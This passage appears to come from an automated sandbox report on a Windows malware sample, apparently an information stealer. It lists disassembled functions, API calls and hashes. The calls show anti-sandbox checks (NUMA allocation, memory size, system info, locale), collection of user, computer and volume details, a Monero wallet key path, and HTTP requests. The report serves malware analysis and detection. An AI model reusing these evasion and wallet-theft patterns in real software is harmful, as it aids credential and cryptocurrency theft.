                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: c3e9a478c648378906fb9dbc94b7c97825d66a0a82ed5c01c8936ac79f396bf3
                            • Instruction ID: 03ec4cd21dd437ab464e0d6acc18068aa7674c7eb7794b1445c382318068ef74
                            • Opcode Fuzzy Hash: c3e9a478c648378906fb9dbc94b7c97825d66a0a82ed5c01c8936ac79f396bf3
                            • Instruction Fuzzy Hash: 78512AB5A1420AEFDF06DFA0D954ABE7BB9BF44704F108048E406BB240D771ED55DBA2
                            Function 00397500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1124 397500-39754a GetWindowsDirectoryA 1125 39754c 1124->1125 1126 397553-3975c7 GetVolumeInformationA call 398d00 * 3 1124->1126 1125->1126 1133 3975d8-3975df 1126->1133 1134 3975fc-397617 GetProcessHeap RtlAllocateHeap 1133->1134 1135 3975e1-3975fa call 398d00 1133->1135 1137 397619-397626 call 39a740 1134->1137 1138 397628-397658 wsprintfA call 39a740 1134->1138 1135->1133 1145 39767e-39768e 1137->1145 1138->1145
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00397542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0039760A
                            • wsprintfA.USER32 ref: 00397640
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$:
                            • API String ID: 1544550907-1412321837
                            • Opcode ID: 741796597e30412a01a4f310c777f1c855247012c46c28d6e023d593188b5bce
                            • Instruction ID: 61c188e0507cf1b58587fabe839c859a9a09381a3f544cb2e4be1d17dd3b4d98
                            • Opcode Fuzzy Hash: 741796597e30412a01a4f310c777f1c855247012c46c28d6e023d593188b5bce
                            • Instruction Fuzzy Hash: 1041C2B1D04248ABDF11DF94CC45FEEBBB8EF18704F100198F509AB280D7786A48CBA5
                            Function 003969F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,011521E8), ref: 003998A1
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152458), ref: 003998BA
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152188), ref: 003998D2
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152200), ref: 003998EA
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,011522A8), ref: 00399903
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,011590B0), ref: 0039991B
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,011453F0), ref: 00399933
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01145330), ref: 0039994C
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152218), ref: 00399964
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152278), ref: 0039997C
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152230), ref: 00399995
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152248), ref: 003999AD
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01145550), ref: 003999C5
                              • Part of subcall function 00399860: GetProcAddress.KERNEL32(74DD0000,01152260), ref: 003999DE
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 003811D0: ExitProcess.KERNEL32 ref: 00381211
                              • Part of subcall function 00381160: GetSystemInfo.KERNEL32(?), ref: 0038116A
                              • Part of subcall function 00381160: ExitProcess.KERNEL32 ref: 0038117E
                              • Part of subcall function 00381110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0038112B
                              • Part of subcall function 00381110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00381132
                              • Part of subcall function 00381110: ExitProcess.KERNEL32 ref: 00381143
                              • Part of subcall function 00381220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0038123E
                              • Part of subcall function 00381220: __aulldiv.LIBCMT ref: 00381258
                              • Part of subcall function 00381220: __aulldiv.LIBCMT ref: 00381266
                              • Part of subcall function 00381220: ExitProcess.KERNEL32 ref: 00381294
                              • Part of subcall function 00396770: GetUserDefaultLangID.KERNEL32 ref: 00396774
                              • Part of subcall function 00381190: ExitProcess.KERNEL32 ref: 003811C6
                              • Part of subcall function 00397850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                              • Part of subcall function 00397850: RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                              • Part of subcall function 00397850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                              • Part of subcall function 003978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                              • Part of subcall function 003978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                              • Part of subcall function 003978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011590D0,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00396AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00396AF9
                            • Sleep.KERNEL32(00001770), ref: 00396B04
                            • CloseHandle.KERNEL32(?,00000000,?,011590D0,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396B1A
                            • ExitProcess.KERNEL32 ref: 00396B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 27af73ac4d39da96a77751ef4b45f2d6afef33cd0f1e3cc20447df60f4fdef43
                            • Instruction ID: 6b975b890f711220085b75eb5934f116fec582bc0825cb981adddc13a7922dc3
                            • Opcode Fuzzy Hash: 27af73ac4d39da96a77751ef4b45f2d6afef33cd0f1e3cc20447df60f4fdef43
                            • Instruction Fuzzy Hash: 99310971914609AADF06FBF0DC5BFEE7B78AF14740F104618F202AA192EF706905D7A2
                            Function 00381220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1204 381220-381247 call 3989b0 GlobalMemoryStatusEx 1207 381249-381271 call 39da00 * 2 1204->1207 1208 381273-38127a 1204->1208 1209 381281-381285 1207->1209 1208->1209 1211 38129a-38129d 1209->1211 1212 381287 1209->1212 1215 381289-381290 1212->1215 1216 381292-381294 ExitProcess 1212->1216 1215->1211 1215->1216
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0038123E
                            • __aulldiv.LIBCMT ref: 00381258
                            • __aulldiv.LIBCMT ref: 00381266
                            • ExitProcess.KERNEL32 ref: 00381294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: b2706110bd2cd010f571cc973cb9ca4553c5fd51bacff6fe71d9c0944b421779
                            • Instruction ID: ce109f179e5ec50dfda1f623d6167f2db447040788b458c7ffd1962a41807aca
                            • Opcode Fuzzy Hash: b2706110bd2cd010f571cc973cb9ca4553c5fd51bacff6fe71d9c0944b421779
                            • Instruction Fuzzy Hash: 0E011DB0D44308BAEF11EBE4DC4AF9EBB7CAB14705F208488F705BA2C0D7B455468799
                            Function 00396AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1218 396af3 1219 396b0a 1218->1219 1221 396aba-396ad7 call 39aad0 OpenEventA 1219->1221 1222 396b0c-396b22 call 396920 call 395b10 CloseHandle ExitProcess 1219->1222 1227 396ad9-396af1 call 39aad0 CreateEventA 1221->1227 1228 396af5-396b04 CloseHandle Sleep 1221->1228 1227->1222 1228->1219
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011590D0,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00396AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00396AF9
                            • Sleep.KERNEL32(00001770), ref: 00396B04
                            • CloseHandle.KERNEL32(?,00000000,?,011590D0,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396B1A
                            • ExitProcess.KERNEL32 ref: 00396B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: cff3c0624422e0c828212ff853bec0222643be9130b2354f78961ee07c3b8749
                            • Instruction ID: d75eb4653aa9644ed1ff582760f580b8f72ad07815b67461fbabed725ef43d0f
                            • Opcode Fuzzy Hash: cff3c0624422e0c828212ff853bec0222643be9130b2354f78961ee07c3b8749
                            • Instruction Fuzzy Hash: ABF05E70944609AFEF02ABA0DC0BBBE7B78FB14745F104514B503A51C1DBB05544E696
                            Function 003847B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 0c14049725591733b208f835eff477e33c638af3601789e59d69f94055cabaf4
                            • Instruction ID: 0c6ff6699bc04081a51feda7fa4cb2fe9df4601de9bd503169c0f435ac2a896f
                            • Opcode Fuzzy Hash: 0c14049725591733b208f835eff477e33c638af3601789e59d69f94055cabaf4
                            • Instruction Fuzzy Hash: CF214FB1D00209ABDF14DFA4E845ADE7B74FB44320F108625F915AB2C1EB706A09CF91
                            Function 003951F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 00386280: InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                              • Part of subcall function 00386280: StrCmpCA.SHLWAPI(?,0115E828), ref: 00386303
                              • Part of subcall function 00386280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                              • Part of subcall function 00386280: HttpOpenRequestA.WININET(00000000,GET,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00386385
                              • Part of subcall function 00386280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                              • Part of subcall function 00386280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: a3e1f226786c0d4bc0337cb1837cb013e00d495bf40278b576f13dcf26b2c28d
                            • Instruction ID: 052276dff5a865f1fb954c1536b1e3adc98f4af3277d83199dd00dc6c13743d6
                            • Opcode Fuzzy Hash: a3e1f226786c0d4bc0337cb1837cb013e00d495bf40278b576f13dcf26b2c28d
                            • Instruction Fuzzy Hash: 42112E30910908ABDF16FFA0DD52AED7778AF50300F404668F80A4E592EF30AB06D7D1
                            Function 003978E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1275 3978e0-397937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 397939-39793e 1275->1276 1277 397942-397945 1275->1277 1278 397962-397972 1276->1278 1277->1278
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: b88e71bd35f9420ff54de30a18d923b90be08e06d5eb259c29cb01ec023c1b37
                            • Instruction ID: cac7a1c82624b38a6a81dfcb686bc9929629d5b56be2a2bbc03b2e0cf905f59d
                            • Opcode Fuzzy Hash: b88e71bd35f9420ff54de30a18d923b90be08e06d5eb259c29cb01ec023c1b37
                            • Instruction Fuzzy Hash: 6D0181B1A04608EFDB10DF98DD45FAABBBCFB04B25F10421AFA45E3680C37459048BA1
                            Function 00381110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0038112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00381132
                            • ExitProcess.KERNEL32 ref: 00381143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 48ba17fc91330bdd96ad2554df90a749fd9ff9b6a831b1a6685eb97311b15926
                            • Instruction ID: 49d6df66046bdaecfbbe25769b155e9e1caaf95d34808bc747af206903a0a5d2
                            • Opcode Fuzzy Hash: 48ba17fc91330bdd96ad2554df90a749fd9ff9b6a831b1a6685eb97311b15926
                            • Instruction Fuzzy Hash: C7E0E6B094534CFFE7106BA09C0EF097ABCEB14B05F204094F7097A1D0D6B52A45A799
                            Function 003810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003810B3
